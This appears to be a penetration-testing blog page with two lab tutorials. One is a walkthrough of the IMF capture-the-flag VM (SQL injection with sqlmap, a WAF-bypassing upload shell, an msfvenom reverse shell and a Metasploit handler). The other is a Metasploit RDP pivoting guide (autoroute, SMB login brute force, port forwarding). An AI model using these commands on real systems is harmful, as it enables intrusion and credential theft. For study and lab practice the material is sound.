Hack the IMF VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this vm machine goes to “Geckom” and it is another CTF challenge where we have to find 6 flags to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.25 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap -sV  192.168.0.25

 We find port 80 is open, so we open it in our browser

We take a look at our source code and found a few javascript files that look like base64 encoded.

We open them and find nothing interesting but when we join their name and decode them we find our 2^nd flag.

Inside the flag we find another base64 encode string, decoding it we find a string called imfadministrator.

We take a look around the website and in the source code of contact.php page we find our 1^st flag.

Flag 1 contains a base64 encoded string decoding it we find a string called allthefiles.

We open allthefiles and imfadministrator on the browser. We find that imfadministrator is a directory that leads to a login page.

In the contact.php page we found a few email addresses so we use cewl to make a dictionary.

We use burpsuite to launch a dictionary attack. We select the position and change the password from string to array.

Now we find the third flag in our response.

Now that we can access the page we see that the page might be vulnerable to sql injection.

Using burpsuite we save the request in a text file.

We use sqlmap to dump the database.

sqlmap -r /root/Desktop/imf.txt --dbs --batch --dump-all

We find the name of the pages along with another page called tutorial-incomplete. We open it on our browser and find a page with QR-code inside an image.

When we decode the QR-code we our 4^th flag.

Inside our flag we find a base64 encoded string, when we decode it we find a string called uploadr942.php         

We open it on our browser and find a page to upload a file.

Now while uploading a shell we find that it is protected from WAF, so we create a custom shell and save it as GIF file to bypass the WAF.

Now we upload the file and check the response from the server to find where our file is uploaded.

We find server sends a string in a comment, we find our file is in uploads folder and the comment in the response sent by server is the name of our file.

After finding our shell, we find 5^th flag. Now we use web_delivery to take reverse shell using metasploit.

We setup our metasploit for web delivery and execute the command on our shell.

Now we have the reverse shell we take a look inside 5^th flag

We find a base64 encode string when we decode it we find a string agentservices.

We check the connections of our server using netstat

Netstat –antp

We found a service running on port 7788, we use curl to find what the server is running on port 7788.

curl localhost:7788

We find a service called agent is running so we find the location of agent using which command

which agent

When we move into the folder we found a file called access_codes, we open it and find a few numbers. It looks like a sequence for port knock.

So we knock the server and find that port 7788 opened.

Knock 192.168.0.25 7482 8279 9467

Now we download agent program file to our system for reverse engineering.

Download agent /root/Desktop

Now we reverse engineer the file to find an exploit. First we disassemble main function.

gdb –q agent

disassemble main

We find that at memory address 80486ba, string compare function takes place so we add a break point there. 

We break the program at 80486ba, and run the program. After running the programs, we look at the memory locations associated with the program.

break *0x80486ba

info registers

We look inside four halfwords of memory above stack pointer

x/4xw 0xffffd340

In the memory address 804c070 we found the password to access the program.

x/s 0x0804c070

Now we access the program from the server using netcat and find that the string can give us access to the program

netcat 192.168.0.25 7788

Now we create an exploit for this program, first we create a shellcode for msfvenom payload.

msfvenom –p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.15 lport=4444 –f python –b \x00\xa0\x0d

Now we create our exploit using python. We manually fuzz the memory location inside our exploit.

We setup our handler on metesploit and execute the shell.

msf > use exploit/multi/handler

msf exploit (handler) > set payload linux/x86/meterpreter/reverse_shell

msf exploit (handler) > set lhost 192.168.0.15

msf exploit (handler) > set lport 4444

msf exploit (handler) > run

now we check for sessions and take the interactive shell

msf exploit (handler) > sessions

msf exploit (handler) > sessions –I 3

Now we take shell check our privileges, we find that we are root. When we move inside the /root/ folder we find our 6^th and final flag.

RDP Pivoting with Metasploit

In our previous turtorial we had discussed on SSH pivoting and today we are going to discuss RDP pivoting.

Pivoting is technique to get inside an unreachable network with help of pivot (centre point). In simple words it is an attack through which attacker can exploit those system which belongs to different network. For this attack, the attacker needs to exploit the main server that helps the attacker to add himself inside its local network and then attacker will able to target the client system for attack.

Lab Setup requirement:

Attacker machine: Kali Linux

Pivot Machine (server): window operating system with two network interface

Target Machine (client): window 7 (Allow RDP service)

Use exploit MS17-010 or muti handler to hack the pivot machine and bypass its UAC to achieve admin privleges.

Sessions

 Hence if you will count then currently attacker has hold 2 sessions, 1^st for meterpreter shell  and 2^nd for bypass UAC of server.

Check network interface through following command:

Meterpreter> ifconfig

From given image you can observe two networks interface in victim’s system 1^st for IP 192.168.0.27 through which attacker is connected and 2^nd for IP 192.168.100.100 through which clients (targets) are connected.

Since attacker belongs to 192.168.0.1 interface and client belongs to 192.168.100.0 interface therefore it is not possible to directly make attack on client network until unless the attacker acquires same network connection. In order to achieve 192.168.100.0 network attacker need run the post exploitation “autoroute”.

This module manages session routing via an existing Meterpreter session. It enables other modules to ‘pivot’ through a compromised host when connecting to the named NETWORK and SUBMASK. Autoadd will search a session for valid subnets from the routing table and interface list then add routes to them. Default will add a default route so that all TCP/IP traffic not specified in the MSF routing table will be routed through the session when pivoting.

msf > use post/multi/manage/autoroute 

msf post(autoroute) > set session 2

msf post(autoroute) > exploit

Note: If you had not bypass UAC you can use session 1 for post exploit

This Module will perform an ARP scan for a given IP range through a Meterpreter Session.

 use post/windows/gather/arp_scanner

msf post(arp_scanner) > set rhosts 192.168.100.100-110

msf post(arp_scanner) > set session 2

msf post(arp_scanner) > set thread 20

msf post(arp_scanner) > exploit

Here we found a new IP 192.1668.100.103 as shown in given image. Let’s perform TCP port scan for activated services on this machine.

This module Enumerates open TCP services by performing a full TCP connect on each port. This does not need administrative privileges on the source machine, which may be useful if pivoting.

use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > set ports 445, 3389

msf auxiliary(tcp) > set rhosts 192.168.100.103

msf auxiliary(tcp) > set thread 10

msf auxiliary(tcp) >exploit

From given you can observe port 3389 and port 445 are open and we know that 3389 is used for RDP and 445 is use for SMB.

This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

use auxiliary/scanner/smb/smb_login

msf exploit (smb_login)>set rhost 192.168.100.103

msf exploit (smb_login)>set user_file  /root/Desktop/user.txt

msf exploit (smb_login)>set pass_file /root/Desktop/pass.txt

msf exploit (smb_login)>set stop_on_success true

msf exploit (smb_login)>exploit

From given image you can observe the highlights pentest: 123 has success login.

Now Type following command for port forwarding on localhost.

Meterpreter> portfwd add –l  3389 –p 3389 –r 192.168.100.103

-l: This is a local port to listen on.

-p: The remote port to connect on.

-r:  The remote host address to connect on.

Now type following command to connect RDP client on localhost through port3389

Rdesktop 127.0.0.1:3389

Now it will ask to enter the credential for connecting with RDP client; Enter the combination of username and password you have retrieved from SMB login Exploit.

If you remembered we have retrieved pentest: 123 through smb login exploit which we are using for login.

Wonderful!! We had successfully exploit RDP client.